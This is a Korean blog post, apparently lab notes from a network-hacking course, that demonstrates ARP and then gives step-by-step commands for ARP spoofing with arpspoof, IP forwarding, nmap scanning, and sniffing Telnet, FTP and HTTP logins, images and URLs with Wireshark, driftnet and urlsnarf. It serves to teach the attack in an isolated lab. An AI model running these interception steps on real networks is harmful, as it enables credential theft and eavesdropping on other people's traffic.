ARP 프로토콜 & ARP Spoofing 공격
Ex1) ARP 동작 확인 및 캡처
<Linux200>
ARP 테이블 초기화 및 확인
# arp -d 192.168.20.201
# arp -a
와이어샤크 실행 및 캡처 실시 (Caputre -> Interfaces -> 랜-카드 Start 클릭)
# wireshark &
window2008(192.168.20.201)로 Ping test
# ping -c 1 192.168.20.201
PING 192.168.41.201 (192.168.41.201) 56(84) bytes of data.
--- 192.168.41.201 ping statistics --- |
ARP 테이블 확인 및 캡처 내용 확인
# arp -a
win2008(192.168.20.201) at 00:0C:29:3E:92:78 [ether] on eth0
Linux200 ARP 패킷 캡처 내용
Linux -> win2008 request 신호 보냄
win2008의 mac adress를 질의하고 신호를 받는다.
win2008 -> Linux reply 신호 보냄
linux 의 mac adress를 질의하고 신호를 받는다.
<Window2008>
ARP 테이블 초기화 및 확인
C:\users\administarator>arp -d arp 전체삭제, window 명령 프롬프트에서 지원.
C:\users\administarator>arp -a ARP 항목을 찾을 수 없습니다. 와이어샤크 실행 및 캡처 Linux200(192.168.20.200)로 Ping Test C:\users\administarator>ping -n 1 192.168.20.200 C:\users\administarator>arp -a 인터페이스 : 192.168.20.201 ---0xb 인터넷 주소 물리적 주소 유형 192.168.20.200 00-0c-29-72-28-7c 동적 Ex2) ARP Spoofing Attack 1 ============================================
-------+------------+-----------+------------- | | | linux200 Kali win2008 (Victim) (Attacker) (Victim) ============================================ <Linux200,Window2008> arp 정보 삭제 초기화 # arp -d 192.168.20.201 C:\users\administarator>arp -d
<Kali Linux>
nmap을 이용하여 같은 서브넷 환경의 시스템 및 서비스 목록을 확인 # nmap -F 192.168.20.0/24 IPv4 Forwarding 임시적 기능 ON # echo 1 > /proc/sys/net/ipv4/ip_forward # cat /proc/sys/net/ipv4/ip_forward 1 IPv4 Forwarding 영구적 ON 설정 방법.
와이어샤크 실행 및 캡처 실행 # wireshark & ARP 스푸핑 실시 (변조된 ARP reply 신호를 지속적으로 보내기) [TERM1] # arpspoof -i eth1 -t 192.168.20.200 192.168.20.201 [TERM2] # arpspoof -i eth1 -t 192.168.20.201 192.168.20.200 와이어샤크 캡처 내용 참고 확인 Linux서버에 win2008의 MAC주소를 Kali Linux의 MAC주소로 전송 win2008서버에 Linux의 MAC주소를 Kali Linux의 MAC주소로 전송
<Window2008> Window2008에서 Linux200(192.168.20.200)으로 Telnet,FTP 서비스 접속 테스트 C:\users\administrator>telnet 192.168.20.200 login :root password: **** [~]# [~]# exit C:\users\administrator>ftp 192.168.20.200 <Linux200,Window2008> arp 정보 확인 Kali Linux MAC 확인 # arp -a
C:\users\administarator>arp -a
<Kali Linux>
Wind2008에서 Linux200으로 접근하는 Telnet,FTP 캡처 내용 확인
와이어샤크 캡처 중지 및 ARP 스푸핑 해지 [TERM1] Ctrl + C [TERM2] Ctrl + C Ex3) ARP Spoofing Attack 2 ============================================
-------+------------+-----------+------------- | | | Firewall Kali win2008 (Victim) (Attacker) (Victim) ============================================ Firewall, Window2008 ARP 정보 삭제 (Firewall)# arp -d <IP> (win2008)C:\>arp -d <Kali Linux> 와이어샤크 캡처 실행 # wireshark & ARP 스푸핑 [TERM1] arpspoof -i eth1 -t 192.168.20.100 192.168.20.201 [TERM2] arpspoof -i eth1 -t 192.168.20.201 192.168.20.100 <Window2008> KT DNS로 Ping 테스트 C:\users\administrator>ping 168.126.63.1 ARP 테이블 확인 C:\users\administrator>arp -a 192.168.20.100 의 MAC주소가 Kali linux의 MAC주소로 되어있는것을 확인할 수 있다. 와이어샤크 캡처 내용
Ex4) ARP Spoofing을 이용한 ID/PWD 해킹 <Window2008> 보안이 취약한 웹-사이트 접속 http://certcollection.org/index.html 접속 이후 abcd/abcd1234로 로그인 <Kali Linux> 와이어샤크 캡처 확인 Filter : http -> Ctrl + F -> String,Packet Bystes 체크 -> abcd -> 찾기
Fire -> Export Objects -> HTTP 클릭 -> Sava All 바탕화면 -> 이름 'HTTP Capture' -> 확인 이미지 저장 확인
Ex5) ARP Spoofing을 이용한 이미지 및 URL 실시간 해킹 <Kali Linux> [TERM1] driftnet -i eth0 [TERM2] urlsnarf -i eth0 <Window2008> Window2008에서 크롬을 실행하여 구글에서 이미지 검색 ex) nba 이미지 검색 -> 클릭 몇번 실시 <Kali Linux> driftnet 창 크기를 좀 크게하여, window2008에서 구글 검색 이미지를 확인한다.
'Learning > └◆Network Hacking' 카테고리의 다른 글
네트워크 해킹 - 04. TCP & UDP 프로토콜 (0) | 2017.01.22 |
---|---|
네트워크 해킹 - 03. ICMP 프로토콜 & ICMP Flooding 공격 (0) | 2017.01.22 |
네트워크 해킹 - 01. MAC 주소 검색 & 이더넷 프레임 구조 (0) | 2017.01.22 |
searchsploit (Exploit DB) (0) | 2017.01.09 |